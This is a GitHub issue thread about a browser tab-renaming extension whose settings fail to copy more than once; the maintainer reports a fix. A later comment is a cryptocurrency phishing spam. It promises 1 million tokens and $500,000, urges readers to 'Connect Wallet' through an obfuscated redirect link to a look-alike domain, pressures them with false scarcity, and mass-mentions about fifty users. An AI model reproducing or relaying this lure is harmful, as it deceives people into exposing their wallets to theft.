### ISSUE TITLE
Settings don't copy more than once

### ISSUE THREAD

**Issue by ReeD333** [yevsa/Tab-Custom-Multiname#1]
![ezgif-3-aa535aa0c583](https://user-images.githubusercontent.com/75673701/101491469-d788fa00-3974-11eb-8f48-7fd8b9bbe237.gif)

[settings.zip](https://github.com/yevsa/Tab-Name-Customizer/files/5659586/settings.zip)

**Comment by yevsa** [comment]
Fixed in f223ec41b77192912985c8b617005585c6ad7d3a

**Comment by n1md7** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
mickeyhan, @fsfIndravi, @handlemyfinance, @anatoly-kor, @mvhirsch, @HAL-XP, @hibana2077, @amargautam, @damanikjosh, @MH-Zarkhani, @ekawibisono, @dtczelo, @june8036, @philliphartin, @moszheng, @heyDolby, @andymike077, @selegiline, @yinfo, @heldinho, @KuanYuChen, @wssll789, @theodesp, @1blockologist, @biblemadeit, @Mohamed3nan, @Maxwellpower1, @alapini, @kdfrmy, @zhn4, @chongruei, @Mike-Kharkov, @Dav-id, @chrisbenincasa, @AppServiceProvider, @nylin93, @neerone, @jbasu, @tchigher, @ishiahirake, @fasterv410, @Paws-Dev, @nishu4288, @sauliu5, @myoauth123, @superzw, @huukuntp1, @Leo4815162342, @emptist, @alansoliditydev
